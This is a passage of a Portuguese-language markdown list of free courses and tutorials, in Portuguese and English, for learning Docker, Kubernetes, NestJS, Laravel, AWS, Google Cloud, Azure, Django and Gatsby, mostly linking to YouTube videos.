- [Curso de Docker Completo](https://www.youtube.com/playlist?list=PLg7nVxv7fa6dxsV1ftKI8FAm4YD6iZuI4)
- [Curso de Docker para iniciantes](https://www.youtube.com/watch?v=np_vyd7QlXk&t=1s&ab_channel=MatheusBattisti-HoradeCodar)
- [Curso de Introdução ao Docker](https://www.youtube.com/playlist?list=PLXzx948cNtr8N5zLNJNVYrvIG6hk0Kxl-)
- [Curso Descomplicando o Docker - LINUXtips 2016](https://www.youtube.com/playlist?list=PLf-O3X2-mxDkiUH0r_BadgtELJ_qyrFJ_)
- [Descomplicando o Docker - LINUXtips 2022](https://www.youtube.com/playlist?list=PLf-O3X2-mxDn1VpyU2q3fuI6YYeIWp5rR)
- [Curso Docker - Jose Carlos Macoratti](https://www.youtube.com/playlist?list=PLJ4k1IC8GhW1kYcw5Fiy71cl-vfoVpqlV)
- [Docker DCA - Caio Delgado](https://www.youtube.com/playlist?list=PL4ESbIHXST_TJ4TvoXezA0UssP1hYbP9_)
- [Docker em 22 minutos - teoria e prática](https://www.youtube.com/watch?v=Kzcz-EVKBEQ&ab_channel=ProgramadoraBordo)
- [Curso de Docker Completo - Cultura DevOps](https://www.youtube.com/playlist?list=PLdOotbFwzDIjPK7wcu4MBCZhm9Lj6mX11)
> Cursos para aprender Docker em Inglês
- [Runnable, Slash Docker](https://runnable.com/docker/)
- [Docker, Docker 101 Tutorial](https://www.docker.com/101-tutorial/)
- [Online IT Guru, Docker Tutorial](https://onlineitguru.com/docker-training)
- [Tutorials Point, Docker Tutorial](https://www.tutorialspoint.com/docker/index.htm)
- [Andrew Odewahn, Docker Jumpstart](https://odewahn.github.io/docker-jumpstart/)
- [Romin Irani, Docker Tutorial Series](https://rominirani.com/docker-tutorial-series-a7e6ff90a023?gi=4504494d886a)
- [LearnDocker Online](https://learndocker.online/)
- [Noureddin Sadawi, Docker Training](https://www.youtube.com/playlist?list=PLea0WJq13cnDsF4MrbNaw3b4jI0GT9yKt)
- [Learn2torials, Latest Docker Tutorials](https://learn2torials.com/category/docker)
- [Docker Curriculum, Docker For Beginners](https://docker-curriculum.com/)
- [Jake Wright, Learn Docker In 12 Minutes](https://www.youtube.com/watch?v=YFl2mCHdv24&ab_channel=JakeWright)
- [Digital Ocean, How To Install And Use Docker](https://www.digitalocean.com/community/tutorial_collections/how-to-install-and-use-docker)
- [LinuxTechLab, The Incomplete Guide To Docker](https://linuxtechlab.com/the-incomplete-guide-to-docker-for-linux/)
- [Play With Docker Classroom, Play With Docker](https://training.play-with-docker.com/)
- [Shota Jolbordi, Introduction to Docker](https://medium.com/free-code-camp/comprehensive-introductory-guide-to-docker-vms-and-containers-4e42a13ee103)
- [Collabnix, The #1 Docker Tutorials, Docker Labs](https://dockerlabs.collabnix.com/)
- [Servers For Hackers, Getting Started With Docker](https://serversforhackers.com/c/getting-started-with-docker)
- [Dive Into Docker, The Complete Course](https://diveintodocker.com/)
- [Hashnode, Docker Tutorial For Beginners](https://hashnode.com/post/docker-tutorial-for-beginners-cjrj2hg5001s2ufs1nker9he2)
- [Docker Crash Course Tutorial](https://www.youtube.com/playlist?list=PL4cUxeGkcC9hxjeEtdHFNYMtCpjNBm3h7)
- [Docker Tutorial for Beginners - freeCodeCamp](https://www.youtube.com/watch?v=fqMOX6JJhGo&ab_channel=freeCodeCamp.org)
- [Docker Tutorial for Beginners - Programming with Mosh](https://www.youtube.com/watch?v=pTFZFxd4hOI&ab_channel=ProgrammingwithMosh)
- [Docker Tutorial for Beginners Full Course in 3 Hours](https://www.youtube.com/watch?v=3c-iBn73dDE&ab_channel=TechWorldwithNana)
- [Docker Tutorial for Beginners Full Course](https://www.youtube.com/watch?v=p28piYY_wv8&ab_channel=Amigoscode)
## 🦜 Sites e cursos para aprender Kubernets
> Cursos para aprender Kubernets em Português
- [Curso de Kubernetes: Introdução ](https://www.youtube.com/watch?v=n1myN27XLfo&list=PLnPZ9TE1Tj4CpbmTsTgqVpRG0hIgHXsaX&ab_channel=MateusSchwede)
- [Apresentação - Curso de Introdução ao Kubernetes ](https://www.youtube.com/watch?v=RuNTvYejG90&list=PLXzx948cNtr8XI5JBemHT9OWuYSPNUtXs&ab_channel=InsightLab)
- [Kubernetes do Zero a Produção ](https://www.youtube.com/watch?v=oxWEVQP5_Rg&ab_channel=FullCycle)
- [Mini Curso Gratuito de Kubernetes para Devs Javascript ](https://www.youtube.com/watch?v=eXKg9B5ooaY&ab_channel=ErickWendel)
- [Containers, Docker e Kubernetes com Giovanni Bassi | #HipstersPontoTube ](https://www.youtube.com/watch?v=wxLvvMxzc1Q&ab_channel=AluraCursosOnline)
- [Kubernetes // Dicionário do Programador ](https://www.youtube.com/watch?v=mVL0nOM3AGo&ab_channel=C%C3%B3digoFonteTV)
- [Kubernetes Tutorial for Beginners [FULL COURSE in 4 Hours] ](https://www.youtube.com/watch?v=X48VuDVv0do&ab_channel=TechWorldwithNana)
- [Kubernetes Course | Kubernetes Training | Kubernetes Tutorial | Intellipaat ](https://www.youtube.com/watch?v=Vjetwwgv36o&ab_channel=Intellipaat)
> Cursos para aprender Kubernets em Inglês
- [Kubernetes Crash Course for Absolute Beginners [NEW] ](https://www.youtube.com/watch?v=s_o8dwzRlu4&ab_channel=TechWorldwithNana)
- [Docker Containers and Kubernetes Fundamentals – Full Hands-On Course ](https://www.youtube.com/watch?v=kTp5xUtcalw&ab_channel=freeCodeCamp.org)
- [Kubernetes Tutorial For Beginners - Learn Kubernetes ](https://www.youtube.com/watch?v=yznvWW_L7AA&ab_channel=Amigoscode)
- [Kubernetes Course - Full Beginners Tutorial (Containerize Your Apps!) ](https://www.youtube.com/watch?v=d6WC5n9G_sM&ab_channel=freeCodeCamp.org)
- [CNCF Kubernetes and Cloud Native Associate Certification Course (KCNA) - Pass the Exam! ](https://www.youtube.com/watch?v=AplluksKvzI&ab_channel=freeCodeCamp.org)
## 🐆 Sites e cursos para aprender Nest
> Cursos para aprender Nest em Português
- [Intensivão Nest.js: do Básico ao Avançado](https://www.youtube.com/watch?v=PHIMN85trgk&ab_channel=FullCycle)
- [CURSO FUNDAMENTOS DO FRAMEWORK NESTJS | AULA #01 | CRIAÇÃO DE APLICAÇÕES BACKEND COM BASE DO NODE.JS](https://www.youtube.com/watch?v=wTvnlgJb9hI&list=PLE0DHiXlN_qqRNX4KpkNKvFswCXHUwoyL&ab_channel=JorgeAluizio)
- [Criando uma aplicação com NestJS e PrismaIO](https://www.youtube.com/watch?v=0Idug0e9tPw&ab_channel=DanieleLe%C3%A3o)
- [Programa em Node.js? Então conheça esse framework (NestJS do ZERO)](https://www.youtube.com/watch?v=TRa55WbWnvQ&ab_channel=Rocketseat)
- [Arquitetura Hexagonal com Nest.js](https://www.youtube.com/watch?v=y4CayhdrSOY&ab_channel=FullCycle)
- [CI/CD: Fazendo deploy de uma aplicação Nest.js no mundo real](https://www.youtube.com/watch?v=89GWF72F0sw&ab_channel=FullCycle)
- [Nest.js: desenvolvimento de APIs](https://www.youtube.com/watch?v=BT7novtdAgI&ab_channel=FullCycle)
- [Conhecendo NestJS | #AluraMais](https://www.youtube.com/watch?v=YHpG6t91oW8&ab_channel=AluraCursosOnline)
- [Clean Architecture com Nest.js na prática](https://www.youtube.com/watch?v=ZOyEFaBSEfk&ab_channel=FullCycle)
- [Desenvolva uma aplicação com Nest.js 9 e aproveite as novidades da nova versão](https://www.youtube.com/watch?v=1yu9084sVjs&ab_channel=FullCycle)
- [Microsserviços com Nest.js e gRPC](https://www.youtube.com/watch?v=0bcwZJhplSE&ab_channel=FullCycle)
- [Iniciando com NestJS - NestJS para Iniciantes](https://www.youtube.com/watch?v=ufSIGVs9X_8&ab_channel=F%C3%A1bricadeC%C3%B3digo)
- [NestJS, o melhor framework backend de NodeJS](https://www.youtube.com/watch?v=bAH4nBb1NFc&ab_channel=PauloSalvatore)
- [Criando CRUD com NestJS + deploy no Heroku em 30 minutos - Code/drops #80](https://www.youtube.com/watch?v=cBIUOL6MFXw&ab_channel=Rocketseat)
- [GraphQL com NestJS, a melhor e mais fácil opção para o backend web](https://www.youtube.com/watch?v=2wBtOsMrPSY&ab_channel=AprendendoaProgramar)
> Cursos para aprender Nest em Inglês
- [NestJS Crash Course | Training #01](https://www.youtube.com/watch?v=5tau19ae6aY&list=PLIGDNOJWiL186E2BIAofH6vbS9GxAWRle&ab_channel=Codewithtkssharma)
- [NestJS Crash Course](https://www.youtube.com/watch?v=xzu3QXwo1BU&list=PL_cUvD4qzbkw-phjGK2qq0nQiG6gw1cKK&ab_channel=AnsontheDeveloper)
- [Nest JS Advance Course #01](https://www.youtube.com/watch?v=i1wN86rnMEI&list=PLIGDNOJWiL1_YrquGbDDN4BNNRy678Spr&ab_channel=Codewithtkssharma)
- [NestJS in 100 Seconds](https://www.youtube.com/watch?v=0M8AYU_hPas&ab_channel=Fireship)
- [Learn Nest.js from Scratch by building an API](https://www.youtube.com/watch?v=F_oOtaxb0L8&ab_channel=Academind)
- [NestJS Crash Course: Everything you need to know! | NodeJS Tutorial 2021](https://www.youtube.com/watch?v=2n3xS89TJMI&list=PLlaDAvA2MhR2jb8zavu6I-w1BA878aHcB&ab_channel=MariusEspejo)
- [Nest JS Advance Course #01](https://www.youtube.com/watch?v=Zmz9ZuSgIro&list=PLT5Jhb7lgSBPcUDAmmEnuiFMrqcurNCs7&ab_channel=CodeStudio)
- [NestJs Course for Beginners - Create a REST API](https://www.youtube.com/watch?v=GHTA143_b-s&ab_channel=freeCodeCamp.org)
- [Nestjs Full Course 2022 | Beginner Nestjs Tutorial](https://www.youtube.com/watch?v=Mgr5_r70OJQ&ab_channel=Bitfumes)
- [NestJS Crash Course - Build a Complete Backend API](https://www.youtube.com/watch?v=BiN-xzNkH_0&ab_channel=LaithAcademy)
- [NestJS Crash Course - 2021](https://www.youtube.com/watch?v=S0R82Osg-Mk&ab_channel=LaithAcademy)
- [NestJS Crash Course](https://www.youtube.com/watch?v=wqhNoDE6pb4&ab_channel=TraversyMedia)
- [NestJS Tutorial - Full Crash Course](https://www.youtube.com/watch?v=MNa-h_uPNmw&ab_channel=MonsterlessonsAcademy)
- [NestJS tutorial for Beginners 1 - Getting Started + Creating First Nest.JS Application](https://www.youtube.com/watch?v=oU5Di3be-Sk&ab_channel=ProgrammingKnowledge)
## 🐿 Sites e cursos para aprender Laravel
> Cursos para aprender Laravel em Português
- [Curso Laravel - Introdução - #01](https://www.youtube.com/watch?v=qH7rsZBENJo&list=PLnDvRpP8BnewYKI1n2chQrrR4EYiJKbUG&ab_channel=MatheusBattisti-HoradeCodar)
- [Curso de Laravel - #01 Introdução e Ambiente PHP](https://www.youtube.com/watch?v=SnOlhaJTMTA&list=PLwXQLZ3FdTVH5Tb57_-ll_r0VhNz9RrXb&ab_channel=RodrigoOliveira)
- [Curso gratuito Laravel 9 INTRO #1 - Introdução e instalação](https://www.youtube.com/watch?v=_h7pq2uc6e4&list=PLcoYAcR89n-reidRFA3XCIvQPeKFt4dQU&ab_channel=TiagoMatos)
- [Curso Gratuito de Laravel 9.x](https://www.youtube.com/watch?v=8IBlbBvcI3U&list=PLVSNL1PHDWvS1e1aeoJV7VvaDZ9m67YPU&ab_channel=CarlosFerreira-EspecializaTi)
- [LARAVEL - 01 | Apresentação do CURSO](https://www.youtube.com/watch?v=jy8I-wZzeN4&list=PLSHNk_yA5fNhzjjOGcIdSB1nyhv6NR0W1&ab_channel=GustavoNeitzke)
- [Laravel 8 - Aula 01 - Laravel 8](https://www.youtube.com/watch?v=z9goB9ntdoI&list=PLxNM4ef1BpxinM_SH_JWtJ-ME11QorxPa&ab_channel=PortalHugoCursos)
- [Convite Curso Gratuito de Laravel 8.x](https://www.youtube.com/watch?v=rljzeWpPNYU&list=PLVSNL1PHDWvQwfqqY7XSobGuV39KsM46G&ab_channel=CarlosFerreira-EspecializaTi)
- [Curso Laravel. Presentación. Vídeo 1](https://www.youtube.com/watch?v=0sHSrqyZCnM&list=PLU8oAlHdN5Bk-qkvjER90g2c_jVmpAHBh&ab_channel=pildorasinformaticas)
[Laravel para iniciantes - Truques e dicas para você aprender de forma ultra rápida](https://www.youtube.com/watch?v=x5C4BmrbFjM&ab_channel=TiagoMatos)
> Cursos para aprender Laravel em Inglês
- [Laravel From Scratch 2022 | 4+ Hour Course](https://www.youtube.com/watch?v=MYyJ4PuL4pY&ab_channel=TraversyMedia)
- [Get Started With Laravel | FREE COURSE](https://www.youtube.com/watch?v=AGE3wRKljkw&ab_channel=EnvatoTuts%2B)
- [React + Laravel Full-stack Application | Build and Deploy](https://www.youtube.com/watch?v=qJq9ZMB2Was&ab_channel=TheCodeholic)
- [Laravel 6 Tutorial for Beginers #1 - Introduction](https://www.youtube.com/watch?v=zckH4xalOns&list=PL4cUxeGkcC9hL6aCFKyagrT1RCfVN4w2Q&ab_channel=TheNetNinja)
- [Laravel PHP Framework Tutorial - Full Course for Beginners (2019)](https://www.youtube.com/watch?v=ImtZ5yENzgE&ab_channel=freeCodeCamp.org)
- [Laravel 8 Tutorial - Installation](https://www.youtube.com/watch?v=RyYKXyvM3D4&list=PLz_YkiqIHesvWMGfavV8JFDQRJycfHUvD&ab_channel=SurfsideMedia)
- [Full Laravel Restaurant Reservation Website | Laravel 9 Tutorial](https://www.youtube.com/watch?v=8KaBeq9JzrQ&ab_channel=Laraveller)
- [Laravel API Server Full Course - Beginner to Intermediate](https://www.youtube.com/watch?v=_zNi37BJVBk&ab_channel=Acadea.io)
- [Build and Deploy Laravel 9 Portfolio - For Beginners](https://www.youtube.com/watch?v=JNhmEoBsZ48&ab_channel=TheCodeholic)
- [Laravel PHP Framework Tutorial - Full Course 6.5 Hours (2020)](https://www.youtube.com/watch?v=BXiHvgrJfkg&ab_channel=Bitfumes)
- [Laravel Crash Course](https://www.youtube.com/watch?v=MFh0Fd7BsjE&ab_channel=TraversyMedia)
- [Laravel 8 tutorial - what is laravel | Introduction](https://www.youtube.com/watch?v=0urHFBFHsLc&list=PL8p2I9GklV46dciS4GDzBFHBi0JVIbnzT&ab_channel=CodeStepByStep)
- [Laravel 9 Tutorial for Beginners | How to Learn Laravel 9 | Complete Laravel 9 Tutorial in 2022](https://www.youtube.com/watch?v=2mqsVzgsV_c&ab_channel=CodeWithDary)
## 🐃 Sites e cursos para aprender AWS
> Cursos para aprender AWS em Português
- [O que é AWS e como aprender mais com o Curso Gratuito Amazon Web Services na Prática - Aula 01 - #32](https://www.youtube.com/watch?v=j6yImUbs4OA&list=PLOF5f9_x-OYUaqJar6EKRAonJNSHDFZUm&ab_channel=UmInventorQualquer)
- [Aula 1 - Curso Completo AWS - Introdução ao mundo da cloud](https://www.youtube.com/watch?v=HiBCv9DolxI&list=PLtL97Owd1gkQ0dfqGW8OtJ-155Gs67Ecz&ab_channel=MundodaCloud)
- [Treinamento AWS Cloud Practitioner](https://www.youtube.com/playlist?list=PLAOaeiAO8J5mjnEwpSUteXZ9y7cT-K42H)
> Cursos para aprender AWS em Inglês
- [AWS Certified Cloud Practitioner Certification Course (CLF-C01) - Pass the Exam!](https://www.youtube.com/watch?v=SOTamWNgDKc&ab_channel=freeCodeCamp.org)
- [AWS Tutorial For Beginners | AWS Full Course - Learn AWS In 10 Hours | AWS Training | Edureka](https://www.youtube.com/watch?v=k1RI5locZE4&list=PL9ooVrP1hQOFWxRJcGdCot7AgJu29SVV3&ab_channel=edureka%21)
- [AWS Data Engineering Tutorial for Beginners [FULL COURSE in 90 mins]](https://www.youtube.com/watch?v=ckQ7d6ca2J0&list=PL8JO6Q_xfjenBPR9uT_G55UdSd5PYjt1D&ab_channel=JohnnyChivers)
- [NEW AWS Certified Cloud Practitioner Course - 10 HOURS of VIDEO](https://www.youtube.com/watch?v=kvP_7jT-ImY&list=PLt1SIbA8guuvfvUDVLpJepmbnYpOfYCIB&ab_channel=StephaneMaarek)
- [AWS Tutorial For Beginners | AWS Full Course - Learn AWS In 10 Hours | AWS Training | Edureka](https://www.youtube.com/watch?v=k1RI5locZE4&ab_channel=edureka%21)
- [AWS Certified Developer - Associate 2020 (PASS THE EXAM!)](https://www.youtube.com/watch?v=RrKRN9zRBWs&ab_channel=freeCodeCamp.org)
- [How I Passed My AWS Cloud Practitioner Exam in 7 Days](https://www.youtube.com/watch?v=s8byh4MCJYw&ab_channel=Soleyman)
- [Learn Terraform (and AWS) by Building a Dev Environment – Full Course for Beginners](https://www.youtube.com/watch?v=iRaai1IBlB0&ab_channel=freeCodeCamp.org)
- [AWS DevOps | AWS DevOps Tutorial For Beginners | AWS DevOps Training | Intellipaat](https://www.youtube.com/watch?v=cI16T7GOPwM&ab_channel=Intellipaat)
- [AWS Certified Cloud Practitioner Training 2020 - Full Course](https://www.youtube.com/watch?v=3hLmDS179YE&ab_channel=freeCodeCamp.org)
- [AWS Full Course 2022 | AWS Tutorial For Beginners 2022 | AWS Training For Beginners | Simplilearn](https://www.youtube.com/watch?v=ZB5ONbD_SMY&ab_channel=Simplilearn)
- [AWS Certified Solutions Architect - Associate 2020 (PASS THE EXAM!)](https://www.youtube.com/watch?v=Ia-UEYYR44s&ab_channel=freeCodeCamp.org)
- [AWS In 10 Minutes | AWS Tutorial For Beginners | AWS Training Video | AWS Tutorial | Simplilearn](https://www.youtube.com/watch?v=r4YIdn2eTm4&ab_channel=Simplilearn)
- [AWS In 5 Minutes | What Is AWS? | AWS Tutorial For Beginners | AWS Training | Simplilearn](https://www.youtube.com/watch?v=3XFODda6YXo&ab_channel=Simplilearn)
- [Top 50+ AWS Services Explained in 10 Minutes](https://www.youtube.com/watch?v=JIbIYCM48to&ab_channel=Fireship)
- [How I would learn AWS Cloud (If I could start over)](https://www.youtube.com/watch?v=Z0EtjKNRdR4&ab_channel=TechWithLucy)
## 🐬 Sites e cursos para aprender Google Cloud
> Cursos para aprender Google Cloud em Português
- [Google Cloud Courses](https://www.youtube.com/results?search_query=Google+Cloud++Courses)
- [Google Cloud, por onde começar e por quê você deveria faze-lo](https://www.youtube.com/watch?v=4lZmhCaq13U&ab_channel=CanaldaCloud)
- [Apresentando o Google Cloud e Montando Servidor Ubuntu | Mini Curso Servidor Web Google Cloud](https://www.youtube.com/watch?v=OfNyUEqerxg&list=PLD4QKjLthwSIXToJoBrIhA7ARyyhUok9Y&ab_channel=MudardeVidaAgora)
- [Saiba mais sobre Google Cloud Platform (GCP)](https://www.youtube.com/watch?v=iIBdj3Mump8&ab_channel=PenaRocks)
> Cursos para aprender Google Cloud em Inglês
- [Google Cloud Associate Cloud Engineer Course - Pass the Exam!](https://www.youtube.com/watch?v=jpno8FSqpc8&ab_channel=freeCodeCamp.org)
- [Google Cloud Platform Full Course | Google Cloud Platform Tutorial | Cloud Computing | Simplilearn](https://www.youtube.com/watch?v=-pMtwYXSFK8&ab_channel=Simplilearn)
- [GCP Fundamentals - Google Cloud Platform Fundamentals: Core Infrastructure #1](https://www.youtube.com/watch?v=uOTy_0gXf7I&list=PLVext98k2evjIFqVggHfvecnFu4tTJK_o&ab_channel=Coursera)
- [What is Google Cloud?](https://www.youtube.com/watch?v=kzKFuHk8ovk&list=PLIivdWyY5sqKh1gDR0WpP9iIOY00IE0xL&ab_channel=GoogleCloudTech)
- [Google Cloud Platform Tutorial for Beginners - Full Course](https://www.youtube.com/watch?v=G5w1rsFe-qA&ab_channel=zuni)
- [Google Cloud Platform Full Course | GCP Tutorial | Google Cloud Training | Edureka](https://www.youtube.com/watch?v=IUU6OR8yHCc&ab_channel=edureka%21)
- [Google Cloud Beginner Tutorial (2023) - Host & Setup A Free Website](https://www.youtube.com/watch?v=1Hyxdg1ZYho&ab_channel=TechExpress)
- [Cloud Computing Full Course In 11 Hours | Cloud Computing Tutorial For Beginners | Edureka](https://www.youtube.com/watch?v=2LaAJq1lB1Q&ab_channel=edureka%21)
- [Google Cloud Certification Path - New GCP Learning Path - List of Google Cloud Certifications](https://www.youtube.com/watch?v=wiR3u8RNxPo&ab_channel=Whizlabs)
- [Google Cloud Platform Tutorial | Google Cloud Platform Tutorial For Beginners | Simplilearn](https://www.youtube.com/watch?v=vACTtmLWiQY&ab_channel=Simplilearn)
- [Google Cloud Training | Google Cloud Platform Course | Google Cloud for Beginners | Intellipaat](https://www.youtube.com/watch?v=gud65lqebrc&ab_channel=Intellipaat)
- [Google Cloud Digital Leader Certification Course - Pass the Exam!](https://www.youtube.com/watch?v=UGRDM86MBIQ&ab_channel=freeCodeCamp.org)
- [Google Cloud Professional Data Engineer Certification Course](https://www.youtube.com/watch?v=rxUlmJpKY4Y&ab_channel=AlphaTutorials-Cloud)
- [Google Cloud Platform Course | GCP Course | GCP Tutorial | GCP Training | Intellipaat](https://www.youtube.com/watch?v=rYJmMmpGhdg&ab_channel=Intellipaat)
## 🦆 Sites e cursos para aprender Azure
> Cursos para aprender Azure em Português
- [Azure (A plataforma Cloud da Microsoft) // Dicionário do Programador](https://www.youtube.com/watch?v=YgE-sZaCuJ0&ab_channel=C%C3%B3digoFonteTV)
- [Azure Fundamentals - Introdução ao Curso](https://www.youtube.com/watch?v=AITM8sTsu-o&list=PLwftZeDnOzt0quETXYfGjfi2AcpeGX-7i&ab_channel=RayCarneiro)
- [AZ-900 | Aula 01 | Curso Completo | Microsoft Azure Fundamentals | Preparação para o Exame AZ900](https://www.youtube.com/watch?v=h5PNYnwApkM&list=PL_yq9hmeKAk_rUvgo0KECZYI1bKzcyncC&ab_channel=HenriqueEduardoSouza)
- [Azure Fundamentos (AZ-900) | Aprendendo na Prática !!](https://www.youtube.com/watch?v=mKDxMG1d76w&ab_channel=KaSolutionOficial)
- [O que é MICROSOFT AZURE? Qual Certificação começar em 2022?](https://www.youtube.com/watch?v=f-oVzkvMwnE&ab_channel=AndreIacono)
- [Como estudar e tirar sua 1ª certificação Azure de forma Gratuita](https://www.youtube.com/watch?v=OPxPFz2i3G4&ab_channel=MentoriaCloud)
- [AZ-900 | EP 1/5 | AZ900 | Treinamento Oficial | Microsoft Azure Fundamentals](https://www.youtube.com/watch?v=4ub1uGKQK6U&ab_channel=CanaldaCloud)
- [Azure na Prática Gratuito #3 - Azure DevOps](https://www.youtube.com/watch?v=6KuoTg1Ojtw&ab_channel=AzurenaPr%C3%A1tica)
> Cursos para aprender Azure em Inglês
- [Microsoft Azure Fundamentals Certification Course (AZ-900) - Pass the exam in 3 hours!](https://www.youtube.com/watch?v=NKEFWyqJ5XA&ab_channel=freeCodeCamp.org)
- [Azure Full Course - Learn Microsoft Azure in 8 Hours | Azure Tutorial For Beginners | Edureka](https://www.youtube.com/watch?v=tDuruX7XSac&ab_channel=edureka%21)
- [AZ-900 | Microsoft Azure Fundamentals Full Course, Free Practice Tests, Website and Study Guides](https://www.youtube.com/watch?v=NPEsD6n9A_I&list=PLGjZwEtPN7j-Q59JYso3L4_yoCjj2syrM&ab_channel=AdamMarczak-AzureforEveryone)
- [AZ-900 Certification Course - Introduction](https://www.youtube.com/watch?v=pY0LnKiDwRA&list=PLlVtbbG169nED0_vMEniWBQjSoxTsBYS3&ab_channel=JohnSavill%27sTechnicalTraining)
- [Azure Full Course - Learn Microsoft Azure in 8 Hours | Azure Tutorial For Beginners | Edureka](https://www.youtube.com/watch?v=tDuruX7XSac&list=PL9ooVrP1hQOHdFketT6JzY-71nBgIu-n0&ab_channel=edureka%21)
- [What Is Azure? | Microsoft Azure Tutorial For Beginners | Microsoft Azure Training | Simplilearn](https://www.youtube.com/watch?v=3Arj5zlUPG4&ab_channel=Simplilearn)
- [Azure Administrator Certification (AZ-104) - Full Course to PASS the Exam](https://www.youtube.com/watch?v=10PbGbTUSAg&ab_channel=freeCodeCamp.org)
- [Azure Developer Associate (AZ-204) — Full Course Pass the Exam!](https://www.youtube.com/watch?v=jZx8PMQjobk&ab_channel=freeCodeCamp.org)
- [Microsoft Azure Developer [Exam AZ-204] Full Course](https://www.youtube.com/watch?v=anef67apIEA&ab_channel=SusanthSutheesh)
- [Azure Administrator Training Course | AZ-103 Training | Intellipaat](https://www.youtube.com/watch?v=ki6rJwXzTSM&ab_channel=Intellipaat)
- [Azure DevOps Tutorial for Beginners | Azure DevOps | Azure DevOps Boards | Intellipaat](https://www.youtube.com/watch?v=0WlDQakFAwE&ab_channel=Intellipaat)
- [Azure Training | Azure Tutorial | Intellipaat](https://www.youtube.com/watch?v=0bNFkI_0jhc&ab_channel=Intellipaat)
- [Azure Course | Microsoft Azure Full Course 2023 | Azure Tutorial For Beginners | Intellipaat](https://www.youtube.com/watch?v=hG-wgtKJ9Es&ab_channel=Intellipaat)
- [Microsoft Azure Fundamentals Certification (AZ-900) Full Course | Azure Online Training | Edureka](https://www.youtube.com/watch?v=wK3U7xSt31M&ab_channel=edureka%21)
## 🦅 Sites e cursos para aprender Django
> Cursos para aprender Django em Português
- [Como Sair do Zero em Django no Python [Passo a Passo Primeiro Site]](https://www.youtube.com/watch?v=DNGI5aD9MJs&ab_channel=HashtagPrograma%C3%A7%C3%A3o)
- [Curso de Django 2 #01: Instalando o Django no Windows](https://www.youtube.com/watch?v=LZsjuSBW5YM&list=PLnDvRpP8BnewqnMzRnBT5LeTpld5bMvsj&ab_channel=MatheusBattisti-HoradeCodar)
- [Como criar ambientes virtuais no Python com virtualenv e instalar pacotes como o Django, numpy, etc](https://www.youtube.com/watch?v=NNHlGCdQSNw&list=PLjv17QYEBJPpd6nI-MXpIa4qR7prKfPQz&ab_channel=RafaelZottesso)
- [Aula 1 - Introdução e conhecendo o Framework](https://www.youtube.com/watch?v=UIvnNCQnejw&list=PLHWfNMxB2F4HdKbo8zdgXyxVDOxH429Ko&ab_channel=GregoryPacheco)
- [Curso Django Avançado - Criando Uma Aplicação - 01](https://www.youtube.com/watch?v=2ayKIJJf1Ls&list=PL2Dw5PtrD32xmc9R48g4GWULWuWkbAllC&ab_channel=Cursosdeprograma%C3%A7%C3%A3o)
- [Loja virtual - e-commerce - utilizando Django](https://www.youtube.com/watch?v=z_MMsWyLdj0&list=PLeFetwYAi-F_9lT7em1UDEXS-3Gm9hjrI&ab_channel=C%C3%93DIGOFLUENTE)
- [Django, Curso de Django para Principiantes](https://www.youtube.com/watch?v=T1intZyhXDU&ab_channel=Fazt)
- [Passo a passo para se tornar um desenvolvedor Python com Django | Aula semanal #31](https://www.youtube.com/watch?v=j2MPk-mVl10&ab_channel=pythonando)
- [Django 4 CRUD completo em 30 minutos](https://www.youtube.com/watch?v=GGBzMpIAgz4&ab_channel=GregoryPacheco)
> Cursos para aprender Django em Inglês
- [Python Django Tutorial 2020 - Full Course for Beginners](https://www.youtube.com/watch?v=JT80XhYJdBw&ab_channel=CleverProgrammer)
- [Python Django 7 Hour Course](https://www.youtube.com/watch?v=PtQiiknWUcI&ab_channel=TraversyMedia)
- [Django For Everybody - Full Python University Course](https://www.youtube.com/watch?v=o0XbHvKxw7Y&ab_channel=freeCodeCamp.org)
- [Python Django Tutorial: Full-Featured Web App Part 1 - Getting Started](https://www.youtube.com/watch?v=UmljXZIypDc&list=PL-osiE80TeTtoQCKZ03TU5fNfx2UY6U4p&ab_channel=CoreySchafer)
- [Python Django Web Framework - Full Course for Beginners](https://www.youtube.com/watch?v=F5mRW0jo-U4&ab_channel=freeCodeCamp.org)
- [How I learned Django in 3 Months](https://www.youtube.com/watch?v=cRF7hIsIO10&ab_channel=DennisIvy)
- [Learn Django Class-Based Views - Using TemplateView - theory and examples](https://www.youtube.com/watch?v=GxA2I-n8NR8&list=PLOLrQ9Pn6caxNb9eFZJ6LfY29nZkKmmXT&ab_channel=VeryAcademy)
- [Django CRM Course - Learn how to build a CRM using Python](https://www.youtube.com/watch?v=LWro0nVdrBw&list=PLpyspNLjzwBka94O3ABYcRYk8IaBR8hXZ&ab_channel=CodeWithStein)
- [How to Build an E-commerce Website with Django and Python](https://www.youtube.com/watch?v=YZvRrldjf1Y&ab_channel=freeCodeCamp.org)
- [Python Backend Web Development Course (with Django)](https://www.youtube.com/watch?v=jBzwzrDvZ18&ab_channel=freeCodeCamp.org)
- [E-commerce Website With Django and Vue Tutorial (Django Rest Framework)](https://www.youtube.com/watch?v=Yg5zkd9nm6w&ab_channel=freeCodeCamp.org)
- [Python Django Tutorial for Beginners](https://www.youtube.com/watch?v=rHux0gMZ3Eg&ab_channel=ProgrammingwithMosh)
## 🐏 Sites e cursos para aprender Gatsby
> Cursos para aprender Gatsby em Português
- [Gatsby JS - Introdução ao tutorial](https://www.youtube.com/watch?v=3b2PinXRqYU&list=PLN9uKzK0o3GR3ky2Q6zc2v0Dlej3oOBtT&ab_channel=ThiagoFranchin)
- [Gatsby (A alternativa ao Next.js que trabalha com MUUUITAS PÁGINAS WEB) // Dicionário do Programador](https://www.youtube.com/watch?v=uYVVzCmKY7M&t=285s&ab_channel=C%C3%B3digoFonteTV)
- [Configurando projeto Gatsby | Behind the Code #09](https://www.youtube.com/watch?v=Z88SWjN6Yj0&t=4431s&ab_channel=Rocketseat)
> Cursos para aprender Gatsby em Inglês
- [Gatsby Tutorial #1 - What is a Static Site Generator?](https://www.youtube.com/watch?v=Qms4k6y7OgI&list=PL4cUxeGkcC9hw1g77I35ZivVLe8k2nvjB&ab_channel=TheNetNinja)
- [Gatsby JS - Introdução ao tutorial](https://www.youtube.com/watch?v=3b2PinXRqYU&list=PLN9uKzK0o3GR3ky2Q6zc2v0Dlej3oOBtT&ab_channel=ThiagoFranchin)
- [Gatsby Static Site Generator Tutorial](https://www.youtube.com/watch?v=RaTpreA0v7Q&ab_channel=freeCodeCamp.org)
- [Gatsby JS Crash Course](https://www.youtube.com/watch?v=6YhqQ2ZW1sc&ab_channel=TraversyMedia)
- [Strapi & GatsbyJS Course - Portfolio Project](https://www.youtube.com/watch?v=Oc_ITwxiG-Y&ab_channel=freeCodeCamp.org)
